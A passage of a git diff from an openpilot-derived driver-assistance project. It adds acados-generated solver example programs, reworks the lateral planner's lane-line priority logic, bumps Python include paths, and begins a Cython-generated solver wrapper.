+#define NHN LAT_NHN +#define NPHIN LAT_NPHIN +#define NR LAT_NR + + +int main() +{ + + lat_solver_capsule *acados_ocp_capsule = lat_acados_create_capsule(); + // there is an opportunity to change the number of shooting intervals in C without new code generation + int N = LAT_N; + // allocate the array and fill it accordingly + double* new_time_steps = NULL; + int status = lat_acados_create_with_discretization(acados_ocp_capsule, N, new_time_steps); + + if (status) + { + printf("lat_acados_create() returned status %d. Exiting.\n", status); + exit(1); + } + + ocp_nlp_config *nlp_config = lat_acados_get_nlp_config(acados_ocp_capsule); + ocp_nlp_dims *nlp_dims = lat_acados_get_nlp_dims(acados_ocp_capsule); + ocp_nlp_in *nlp_in = lat_acados_get_nlp_in(acados_ocp_capsule); + ocp_nlp_out *nlp_out = lat_acados_get_nlp_out(acados_ocp_capsule); + ocp_nlp_solver *nlp_solver = lat_acados_get_nlp_solver(acados_ocp_capsule); + void *nlp_opts = lat_acados_get_nlp_opts(acados_ocp_capsule); + + // initial condition + int idxbx0[NBX0]; + idxbx0[0] = 0; + idxbx0[1] = 1; + idxbx0[2] = 2; + idxbx0[3] = 3; + + double lbx0[NBX0]; + double ubx0[NBX0]; + lbx0[0] = 0; + ubx0[0] = 0; + lbx0[1] = 0; + ubx0[1] = 0; + lbx0[2] = 0; + ubx0[2] = 0; + lbx0[3] = 0; + ubx0[3] = 0; + + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "idxbx", idxbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "lbx", lbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "ubx", ubx0); + + // initialization for state values + double x_init[NX]; + x_init[0] = 0.0; + x_init[1] = 0.0; + x_init[2] = 0.0; + x_init[3] = 0.0; + + // initial value for control input + double u0[NU]; + u0[0] = 0.0; + // set parameters + double p[NP]; + p[0] = 0; + p[1] = 0; + + for (int ii = 0; ii <= N; ii++) + { + lat_acados_update_params(acados_ocp_capsule, ii, p, NP); + } + + + // prepare evaluation + int NTIMINGS = 1; + double min_time = 1e12; + double kkt_norm_inf; + double elapsed_time; + int sqp_iter; + + double xtraj[NX * (N+1)]; + double utraj[NU * N]; + + + // solve ocp in loop + int rti_phase = 0; + + for (int ii = 0; ii < NTIMINGS; ii++) + { + // initialize solution + for (int i = 0; i < N; i++) + { + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "x", x_init); + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "u", u0); + } + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, N, "x", x_init); + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "rti_phase", &rti_phase); + status = lat_acados_solve(acados_ocp_capsule); + ocp_nlp_get(nlp_config, nlp_solver, "time_tot", &elapsed_time); + min_time = MIN(elapsed_time, min_time); + } + + /* print solution and statistics */ + for (int ii = 0; ii <= nlp_dims->N; ii++) + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, ii, "x", &xtraj[ii*NX]); + for (int ii = 0; ii < nlp_dims->N; ii++) + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, ii, "u", &utraj[ii*NU]); + + printf("\n--- xtraj ---\n"); + d_print_exp_tran_mat( NX, N+1, xtraj, NX); + printf("\n--- utraj ---\n"); + d_print_exp_tran_mat( NU, N, utraj, NU ); + // ocp_nlp_out_print(nlp_solver->dims, nlp_out); + + printf("\nsolved ocp %d times, solution printed above\n\n", NTIMINGS); + + if (status == ACADOS_SUCCESS) + { + printf("lat_acados_solve(): SUCCESS!\n"); + } + else + { + printf("lat_acados_solve() failed with status %d.\n", status); + } + + // get solution + ocp_nlp_out_get(nlp_config, nlp_dims, nlp_out, 0, "kkt_norm_inf", &kkt_norm_inf); + ocp_nlp_get(nlp_config, nlp_solver, "sqp_iter", &sqp_iter); + + lat_acados_print_stats(acados_ocp_capsule); + + printf("\nSolver info:\n"); + printf(" SQP iterations %2d\n minimum time for %d solve %f [ms]\n KKT %e\n", + sqp_iter, NTIMINGS, min_time*1000, kkt_norm_inf); + + // free solver + status = lat_acados_free(acados_ocp_capsule); + if (status) { + printf("lat_acados_free() returned status %d. \n", status); + } + // free solver capsule + status = lat_acados_free_capsule(acados_ocp_capsule); + if (status) { + printf("lat_acados_free_capsule() returned status %d. \n", status); + } + + return status; +} diff --git a/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/main_sim_lat.c b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/main_sim_lat.c new file mode 100644 index 000000000..c536654fd --- /dev/null +++ b/selfdrive/controls/lib/lateral_mpc_lib/c_generated_code/main_sim_lat.c @@ -0,0 +1,128 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + + +// standard +#include +#include +// acados +#include "acados/utils/print.h" +#include "acados/utils/math.h" +#include "acados_c/sim_interface.h" +#include "acados_sim_solver_lat.h" + +#define NX LAT_NX +#define NZ LAT_NZ +#define NU LAT_NU +#define NP LAT_NP + + +int main() +{ + int status = 0; + sim_solver_capsule *capsule = lat_acados_sim_solver_create_capsule(); + status = lat_acados_sim_create(capsule); + + if (status) + { + printf("acados_create() returned status %d. Exiting.\n", status); + exit(1); + } + + sim_config *acados_sim_config = lat_acados_get_sim_config(capsule); + sim_in *acados_sim_in = lat_acados_get_sim_in(capsule); + sim_out *acados_sim_out = lat_acados_get_sim_out(capsule); + void *acados_sim_dims = lat_acados_get_sim_dims(capsule); + + // initial condition + double x_current[NX]; + x_current[0] = 0.0; + x_current[1] = 0.0; + x_current[2] = 0.0; + x_current[3] = 0.0; + + + x_current[0] = 0; + x_current[1] = 0; + x_current[2] = 0; + x_current[3] = 0; + + + + + // initial value for control input + double u0[NU]; + u0[0] = 0.0; + // set parameters + double p[NP]; + p[0] = 0; + p[1] = 0; + + lat_acados_sim_update_params(capsule, p, NP); + + + int n_sim_steps = 3; + // solve ocp in loop + for (int ii = 0; ii < n_sim_steps; ii++) + { + sim_in_set(acados_sim_config, acados_sim_dims, + acados_sim_in, "x", x_current); + status = lat_acados_sim_solve(capsule); + + if (status != ACADOS_SUCCESS) + { + printf("acados_solve() failed with status %d.\n", status); + } + + sim_out_get(acados_sim_config, acados_sim_dims, + acados_sim_out, "x", x_current); + + printf("\nx_current, %d\n", ii); + for (int jj = 0; jj < NX; jj++) + { + printf("%e\n", x_current[jj]); + } + } + + printf("\nPerformed %d simulation steps with acados integrator successfully.\n\n", n_sim_steps); + + // free solver + status = lat_acados_sim_free(capsule); + if (status) { + printf("lat_acados_sim_free() returned status %d. \n", status); + } + + lat_acados_sim_solver_free_capsule(capsule); + + return status; +} diff --git a/selfdrive/controls/lib/lateral_planner.py b/selfdrive/controls/lib/lateral_planner.py index 7437b1cc3..e817b5b71 100644 --- a/selfdrive/controls/lib/lateral_planner.py +++ b/selfdrive/controls/lib/lateral_planner.py @@ -4,12 +4,11 @@ from common.numpy_fast import interp from system.swaglog import cloudlog from selfdrive.controls.lib.lateral_mpc_lib.lat_mpc import LateralMpc from selfdrive.controls.lib.lateral_mpc_lib.lat_mpc import N as LAT_MPC_N -from selfdrive.controls.lib.drive_helpers import CONTROL_N, MIN_SPEED, get_lane_laneless_mode, get_speed_error +from selfdrive.controls.lib.drive_helpers import CONTROL_N, MIN_SPEED, get_speed_error from selfdrive.controls.lib.desire_helper import DesireHelper import cereal.messaging as messaging from cereal import log from selfdrive.controls.lib.lane_planner import LanePlanner -from selfdrive.hardware import TICI from common.params import Params TRAJECTORY_SIZE = 33 @@ -30,13 +29,15 @@ STEERING_RATE_COST = 700.0 class LateralPlanner: def __init__(self, CP, debug=False): self.DH = DesireHelper() - self.LP = LanePlanner() - # dp - laneline mode - self.dp_lanelines_enable = False - self.dp_lanelines_active = False - self.dp_camera_offset = 4 if TICI else -6 - self.dp_path_offset = 4 if TICI else 0 + # dp - lanefull + params = Params() + self._dp_lat_lane_priority_mode = params.get_bool("dp_lat_lane_priority_mode") + self._dp_lat_lane_priority_mode_active = False + self._dp_lat_lane_priority_mode_active_prev = False + self.LP = LanePlanner() + # dp // mapd - for vision turn controller + self.d_path_w_lines_xyz = np.zeros((TRAJECTORY_SIZE, 3)) # Vehicle model parameters used to calculate lateral movement of car self.factor1 = CP.wheelbase - CP.centerToFront @@ -54,7 +55,6 @@ class LateralPlanner: self.v_ego = 0.0 self.l_lane_change_prob = 0.0 self.r_lane_change_prob = 0.0 - self.d_path_w_lines_xyz = np.zeros((TRAJECTORY_SIZE, 3)) self.debug_mode = debug @@ -69,14 +69,6 @@ class LateralPlanner: # clip speed , lateral planning is not possible at 0 speed measured_curvature = sm['controlsState'].curvature v_ego_car = sm['carState'].vEgo - if sm.updated['dragonConf']: - self.dp_lanelines_enable = sm['dragonConf'].dpLateralLanelines - self.dp_camera_offset = sm['dragonConf'].dpLateralCameraOffset - self.dp_path_offset = sm['dragonConf'].dpLateralPathOffset - if sm['controlsState'].dpLateralAltActive and sm['dragonConf'].dpLateralAltLanelines: - self.dp_lanelines_enable = True - self.dp_camera_offset = sm['dragonConf'].dpLateralAltCameraOffset - self.dp_path_offset = sm['dragonConf'].dpLateralAltPathOffset # Parse model predictions md = sm['modelV2'] @@ -90,27 +82,28 @@ class LateralPlanner: self.v_plan = np.clip(car_speed, MIN_SPEED, np.inf) self.v_ego = self.v_plan[0] - if self.dp_lanelines_enable: - # dp - when laneline mode enabled, we use old logic (including lane changing) - d_path_xyz = self.lanelines_mode(md, sm['carState'], sm['carControl'].latActive, sm['dragonConf']) - else: - self.dp_lanelines_active = False - # dp -- tab spacing begin (stock logic) -- - # Lane change logic - desire_state = md.meta.desireState - if len(desire_state): - self.l_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeLeft] - self.r_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeRight] - lane_change_prob = self.l_lane_change_prob + self.r_lane_change_prob - self.DH.update(sm['carState'], sm['carControl'].latActive, lane_change_prob, sm['dragonConf'], md) + # Lane change logic + desire_state = md.meta.desireState + if len(desire_state): + self.l_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeLeft] + self.r_lane_change_prob = desire_state[log.LateralPlan.Desire.laneChangeRight] + + if self._dp_lat_lane_priority_mode: + self.LP.parse_model(md) + lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob + else: + lane_change_prob = self.l_lane_change_prob + self.r_lane_change_prob + + self.DH.update(sm['carState'], sm['carControl'].latActive, lane_change_prob) + + path_xyz = self._get_laneless_laneline_d_path_xyz() if self._dp_lat_lane_priority_mode else self.path_xyz + self.d_path_w_lines_xyz = path_xyz - d_path_xyz = self.path_xyz - # dp -- tab spacing end (stock logic) -- self.lat_mpc.set_weights(PATH_COST, LATERAL_MOTION_COST, LATERAL_ACCEL_COST, LATERAL_JERK_COST, STEERING_RATE_COST) - y_pts = d_path_xyz[:LAT_MPC_N+1, 1] + y_pts = path_xyz[:LAT_MPC_N+1, 1] heading_pts = self.plan_yaw[:LAT_MPC_N+1] yaw_rate_pts = self.plan_yaw_rate[:LAT_MPC_N+1] self.y_pts = y_pts @@ -168,35 +161,44 @@ class LateralPlanner: lateralPlan.solverState.u = self.lat_mpc.u_sol.flatten().tolist() lateralPlan.desire = self.DH.desire - lateralPlan.useLaneLines = self.dp_lanelines_active + lateralPlan.useLaneLines = self._dp_lat_lane_priority_mode and self._dp_lat_lane_priority_mode_active lateralPlan.laneChangeState = self.DH.lane_change_state lateralPlan.laneChangeDirection = self.DH.lane_change_direction - plan_send.lateralPlan.dPathWLinesX = [float(x) for x in self.d_path_w_lines_xyz[:, 0]] - plan_send.lateralPlan.dPathWLinesY = [float(y) for y in self.d_path_w_lines_xyz[:, 1]] - pm.send('lateralPlan', plan_send) - def lanelines_mode(self, md, car_state, lat_active, dragon_conf): - # update camera/path offset to lane planner - self.LP.update_dp_camera_offsets(self.dp_camera_offset, self.dp_path_offset) - # Parse model predictions - self.LP.parse_model(md) + # dp - extension + plan_ext_send = messaging.new_message('lateralPlanExt') - # Lane change logic - lane_change_prob = self.LP.l_lane_change_prob + self.LP.r_lane_change_prob - self.DH.update(car_state, lat_active, lane_change_prob, dragon_conf, md) + lateralPlanExt = plan_ext_send.lateralPlanExt + lateralPlanExt.dPathWLinesX = [float(x) for x in self.d_path_w_lines_xyz[:, 0]] + lateralPlanExt.dPathWLinesY = [float(y) for y in self.d_path_w_lines_xyz[:, 1]] - # Turn off lanes during lane change - if self.DH.desire == log.LateralPlan.Desire.laneChangeRight or self.DH.desire == log.LateralPlan.Desire.laneChangeLeft: - self.LP.lll_prob *= self.DH.lane_change_ll_prob - self.LP.rll_prob *= self.DH.lane_change_ll_prob + pm.send('lateralPlanExt', plan_ext_send) - # dynamic laneline/laneless logic - self.dp_lanelines_active = get_lane_laneless_mode(self.LP.lll_prob, self.LP.rll_prob, self.dp_lanelines_active) + def _get_laneless_laneline_d_path_xyz(self): + if self._dp_lat_lane_priority_mode and self.LP is not None: + # Turn off lanes during lane change + if self.DH.desire == log.LateralPlan.Desire.laneChangeRight or self.DH.desire == log.LateralPlan.Desire.laneChangeLeft: + self.LP.lll_prob *= self.DH.lane_change_ll_prob + self.LP.rll_prob *= self.DH.lane_change_ll_prob - # Calculate final driving path and set MPC costs - if self.dp_lanelines_active: + # decide what mode should we use + if (self.LP.lll_prob + self.LP.rll_prob)/2 < 0.3: + self._dp_lat_lane_priority_mode_active = False + if (self.LP.lll_prob + self.LP.rll_prob)/2 > 0.5: + self._dp_lat_lane_priority_mode_active = True + + # perform reset mpc + if self._dp_lat_lane_priority_mode_active != self._dp_lat_lane_priority_mode_active_prev: + self.reset_mpc() + self._dp_lat_lane_priority_mode_active_prev = self._dp_lat_lane_priority_mode_active + + # use default path if not active + if not self._dp_lat_lane_priority_mode_active: + return self.path_xyz + + # use lane planner path return self.LP.get_d_path(self.v_ego, self.t_idxs, self.path_xyz) else: return self.path_xyz diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/acados_ocp_long.json b/selfdrive/controls/lib/longitudinal_mpc_lib/acados_ocp_long.json index 0b3ebc108..07ded706d 100644 --- a/selfdrive/controls/lib/longitudinal_mpc_lib/acados_ocp_long.json +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/acados_ocp_long.json @@ -431,7 +431,7 @@ ], "zu_e": [] }, - "cython_include_dirs": "/usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include", + "cython_include_dirs": "/usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/core/include", "dims": { "N": 12, "nbu": 0, diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/Makefile b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/Makefile index f98fb1dfc..366999c16 100644 --- a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/Makefile +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/Makefile @@ -154,7 +154,7 @@ ocp_cython_o: ocp_cython_c -I $(INCLUDE_PATH)/blasfeo/include/ \ -I $(INCLUDE_PATH)/hpipm/include/ \ -I $(INCLUDE_PATH) \ - -I /usr/local/pyenv/versions/3.8.10/lib/python3.8/site-packages/numpy/core/include \ + -I /usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/core/include \ acados_ocp_solver_pyx.c \ ocp_cython: ocp_cython_o diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_ocp_solver_pyx.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_ocp_solver_pyx.c new file mode 100644 index 000000000..ebe24ee7f --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_ocp_solver_pyx.c @@ -0,0 +1,40397 @@ +/* Generated by Cython 3.0.0 */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + 